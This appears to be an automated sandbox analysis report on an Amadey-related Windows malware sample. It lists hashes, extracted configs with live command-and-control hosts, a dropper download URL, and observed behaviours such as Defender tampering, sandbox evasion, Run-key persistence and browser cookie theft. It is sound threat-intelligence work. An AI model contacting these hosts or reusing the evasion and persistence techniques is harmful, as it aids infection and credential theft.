amadey | f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b

Resubmissions

29/03/2025, 12:48

250329-p16hqsttbw 10

29/03/2025, 09:47

250329-lsnfea1ses 10

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
29/03/2025, 09:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-29_5ec95a42b16d80c72d17cc6d0bac58de_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

5ec95a42b16d80c72d17cc6d0bac58de
SHA1

9cfd9221606e1acfef1ea5f6f4bf88080822d5db
SHA256

f3d7546937b4791736e3f2182526a0ac22d47060cce53c4ab8e439b65742127b
SHA512

ca64237e9b54295b3162e26808d6c9acbef0640a996534425e21898b456e5117142bfe4d30473d2573ef42d08f0a85475d1cab63153e7b1b573011f67f735f0b
SSDEEP

24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:dTvC/MTQYxsWR7a0X

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

lumma

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://triplooqp.world/APowko

https://7wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://castmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://smeltingt.run/giiaus

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 30 IoCs

stealer

resource	yara_rule
behavioral2/memory/5856-250-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-251-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-291-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-294-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-301-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-312-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-322-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-346-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-347-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-359-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-363-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-404-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-807-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-808-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-809-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-820-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-823-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-846-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-852-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-874-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-878-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-881-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1259-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1283-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1286-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1296-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1311-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1312-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/5856-1313-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2528-2136-0x00000000006A0000-0x0000000000AF6000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral2/memory/2528-1344-0x00000000006A0000-0x0000000000AF6000-memory.dmp	healer
behavioral2/memory/2528-1345-0x00000000006A0000-0x0000000000AF6000-memory.dmp	healer
behavioral2/memory/2528-2187-0x00000000006A0000-0x0000000000AF6000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/memory/5308-134-0x0000000008640000-0x0000000008794000-memory.dmp	family_quasar
behavioral2/memory/5308-135-0x00000000053A0000-0x00000000053BA000-memory.dmp	family_quasar

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	202a17038f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE

Blocklisted process makes network request 6 IoCs

flow	pid	Process
10	3852	powershell.exe
39	5308	powershell.exe
40	5308	powershell.exe
42	5308	powershell.exe
81	1436	powershell.exe
123	3536	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5128	powershell.exe
25264	powershell.exe
6116	powershell.exe
1892	powershell.exe
3624	powershell.exe
3404	PowerShell.exe
2032	powershell.exe
3996	powershell.exe
1816	powershell.exe
20216	powershell.exe
17908	powershell.exe
26540	powershell.exe
3852	powershell.exe
5308	powershell.exe
1436	powershell.exe
3536	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 13 IoCs

flow	pid	Process
81	1436	powershell.exe
46	2980	rapes.exe
46	2980	rapes.exe
46	2980	rapes.exe
46	2980	rapes.exe
10	3852	powershell.exe
35	2980	rapes.exe
165	1868	futors.exe
130	1868	futors.exe
63	1868	futors.exe
63	1868	futors.exe
82	1868	futors.exe
123	3536	powershell.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
1192	takeown.exe
5496	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 30 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5624	chrome.exe
4276	chrome.exe
25644	msedge.exe
18316	chrome.exe
2040	chrome.exe
544	msedge.exe
25076	chrome.exe
25588	chrome.exe
25580	chrome.exe
25748	msedge.exe
19948	chrome.exe
5612	msedge.exe
23108	chrome.exe
23072	chrome.exe
2156	msedge.exe
624	chrome.exe
3744	msedge.exe
2208	chrome.exe
25716	msedge.exe
860	chrome.exe
4816	chrome.exe
4752	msedge.exe
5404	msedge.exe
20156	chrome.exe
25268	chrome.exe
25732	msedge.exe
2924	chrome.exe
3104	chrome.exe
2912	chrome.exe
22892	chrome.exe

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	202a17038f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	202a17038f.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	Bell_Setup16.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	22.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	rapes.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_07bc83df.cmd	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_07bc83df.cmd	powershell.exe

Executes dropped EXE 18 IoCs

pid	Process
4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
2980	rapes.exe
5592	amnew.exe
1868	futors.exe
116	apple.exe
6020	22.exe
1224	22.exe
384	gron12321.exe
3108	accde9cdf4.exe
4016	v7942.exe
4888	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
4708	alex1dskfmdsf.exe
1532	483d2fa8a0d53818306efeb32d3.exe
2996	Bell_Setup16.exe
2284	202a17038f.exe
5172	Bell_Setup16.tmp
5636	Bell_Setup16.exe
4008	Bell_Setup16.tmp

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	202a17038f.exe
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Wine	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE

Loads dropped DLL 1 IoCs

pid	Process
5760	regsvr32.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1192	takeown.exe
5496	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\accde9cdf4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367620101\\accde9cdf4.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367630121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\202a17038f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10367950101\\202a17038f.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000024360-211.dat	autoit_exe
behavioral2/files/0x000a00000002439d-1074.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
4884	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
2980	rapes.exe
4888	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
1532	483d2fa8a0d53818306efeb32d3.exe
2284	202a17038f.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 384 set thread context of 4424	384	gron12321.exe	154
PID 4016 set thread context of 5856	4016	v7942.exe	197
PID 4708 set thread context of 4396	4708	alex1dskfmdsf.exe	214

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2796	sc.exe
1680	sc.exe
2948	sc.exe
3240	sc.exe
3928	sc.exe
4912	sc.exe
4552	sc.exe
5680	sc.exe
852	sc.exe
3460	sc.exe
1892	sc.exe
5512	sc.exe
2592	sc.exe
4948	sc.exe
848	sc.exe
5100	sc.exe
844	sc.exe
548	sc.exe
2840	sc.exe
5772	sc.exe
2420	sc.exe
5888	sc.exe
3004	sc.exe
2580	sc.exe
4748	sc.exe
1964	sc.exe
2360	sc.exe
2112	sc.exe
4732	sc.exe
4776	sc.exe
3400	sc.exe
2744	sc.exe
4908	sc.exe
1188	sc.exe
5024	sc.exe
5468	sc.exe
2040	sc.exe
3764	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 7 IoCs

pid	pid_target	Process	procid_target
18848	2528	WerFault.exe	380
18984	3052	WerFault.exe	378
24892	18916	WerFault.exe	393
25352	24920	WerFault.exe	415
11928	17156	WerFault.exe	482
24396	10320	WerFault.exe	502
18608	10376	WerFault.exe	501

System Location Discovery: System Language Discovery 1 TTPs 45 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	accde9cdf4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp0BR3QHAEAALLHWZSWNOYLAORKSWIW2SF.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	22.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempSX03FLWS9IV2JSS9DHFTQLNKT5ULF20K.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	202a17038f.exe
